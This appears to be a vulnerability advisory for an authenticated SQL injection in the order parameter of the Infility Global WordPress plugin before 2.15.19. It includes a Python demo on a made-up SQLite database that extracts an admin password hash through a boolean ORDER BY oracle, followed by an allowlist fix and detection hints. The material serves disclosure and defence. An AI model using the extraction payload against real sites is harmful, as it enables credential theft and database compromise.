Impact
The Infility Global WordPress plugin, in versions prior to 2.15.19, does not properly sanitize and escape the order parameter before using it in SQL statements, so the value is concatenated into a query and interpreted as SQL rather than treated as data. An authenticated attacker with Subscriber privileges or higher can supply a crafted value for the order parameter and execute arbitrary SQL against the site's database. The consequences are data exfiltration and tampering beyond anything the plugin is meant to expose (an injection point in one plugin query reaches every table the site's database account can see, including WordPress core tables), and further escalation depends on what that database account is permitted to do.
Affected Systems
All versions of the Infility Global WordPress plugin earlier than 2.15.19 are affected. The vulnerable code is part of the core plugin rather than an optional module or setting, so every site running a version prior to 2.15.19 is exposed regardless of how the plugin is configured.
Risk and Exploitability
Exploitation requires an authenticated account with at least Subscriber privileges, the lowest of the standard WordPress roles; the attack consists of such a user submitting a crafted value in the order parameter. Subscriber is also the role WordPress assigns to self-registered accounts by default, so on a site with open registration the effective bar is close to unauthenticated. No EPSS score is available and the vulnerability is not listed in the CISA KEV catalog, so no real-world exploitation has been reported at this time. Once the required access is obtained, however, SQL injection gives the attacker direct read and write access to the database, and the risk to data confidentiality and integrity is high. The source data does not list a patch explicitly, but the affected range (versions prior to 2.15.19) implies 2.15.19 as the first fixed release: update to 2.15.19 or later. Until the update is applied, restricting or disabling open user registration and reviewing existing Subscriber accounts reduces the pool of accounts that can reach the vulnerable code. Note for anyone patching similar code: if, as the parameter name suggests, the value selects a sort column or direction, it cannot be bound through a query placeholder, and escaping quotes does not help in that position either; the value must be validated against a fixed allowlist.
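To make the flaw described above and its fix concrete, the following is an added example written for this page; it is not code from the Infility Global plugin or from the OpenCVE record. It models the pattern in Python with an in-memory SQLite database and constructed sample rows. It assumes, as the parameter name suggests, that the plugin's order value ends up in an ORDER BY clause (the plugin's actual query is not given here); the plugin_items table, the admin row and the hash string are all made up. The vulnerable function shows how a Subscriber can read wp_users without ever seeing it in a response, since only the row order changes, and the hardened function shows the allowlist that replaces the concatenation.

```python
import sqlite3

# Constructed sample data standing in for a WordPress database: a table the
# plugin legitimately sorts, and wp_users, which the plugin never means to touch.
# The user_pass value is a placeholder string, not a real password hash.
def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE plugin_items (id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO plugin_items VALUES (1, 'alpha'), (2, 'bravo'), (3, 'charlie');
        CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
        INSERT INTO wp_users VALUES (1, 'admin', '$P$Bconstructed.hash');
    """)
    return db


def vulnerable_query(db, order):
    """The flawed pattern: the request's order value goes straight into the
    statement. A placeholder cannot help here; a sort column or direction is
    SQL syntax, not a bound value, which is why escaping alone is not a fix."""
    sql = "SELECT id, title FROM plugin_items ORDER BY " + order
    return [row[0] for row in db.execute(sql)]


def oracle_payload(position, char):
    """ORDER BY expression that sorts ascending by id when character
    `position` of the admin hash equals `char`, and descending otherwise.
    The response never shows wp_users, but the row order leaks one bit."""
    return ("(CASE WHEN (SELECT substr(user_pass, %d, 1) FROM wp_users "
            "WHERE user_login = 'admin') = '%s' THEN id ELSE -id END)"
            % (position, char))


CHARSET = "$./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

def extract_hash_prefix(db, length, charset=CHARSET):
    """Boolean-based extraction through the vulnerable sort: ascending id
    order means 'true'. Stops early if a character is outside the charset."""
    recovered = ""
    for position in range(1, length + 1):
        for char in charset:
            if vulnerable_query(db, oracle_payload(position, char)) == [1, 2, 3]:
                recovered += char
                break
        else:
            break
    return recovered


# Hardened form: map the untrusted strings onto fixed tokens. Only these
# literal column names and directions can ever reach the SQL text; anything
# else silently falls back to the default sort.
ALLOWED_COLUMNS = {"id": "id", "title": "title"}
ALLOWED_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}

def hardened_query(db, orderby, order):
    column = ALLOWED_COLUMNS.get(str(orderby).strip().lower(), "id")
    direction = ALLOWED_DIRECTIONS.get(str(order).strip().lower(), "ASC")
    sql = "SELECT id, title FROM plugin_items ORDER BY %s %s" % (column, direction)
    return [row[0] for row in db.execute(sql)]


if __name__ == "__main__":
    db = build_db()
    print("vulnerable, legitimate input:", vulnerable_query(db, "title DESC"))
    print("vulnerable, hash prefix leaked:", extract_hash_prefix(db, 4))
    print("hardened, same payload:", hardened_query(db, oracle_payload(1, "$"), "ASC"))
```

In WordPress terms, the ORDER BY position is the part of a statement that neither $wpdb->prepare() placeholders nor esc_sql() can protect: a %s placeholder turns the value into a quoted string constant, and esc_sql() only escapes quotes for use inside one. The equivalent of ALLOWED_COLUMNS and ALLOWED_DIRECTIONS in plugin code is a hand-written allowlist, or sanitize_sql_orderby() for a combined column-plus-direction string. On the detection side the same observation is the check: a sort parameter containing parentheses, SELECT, CASE, or a quote character is never a legitimate sort field.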
OpenCVE Enrichment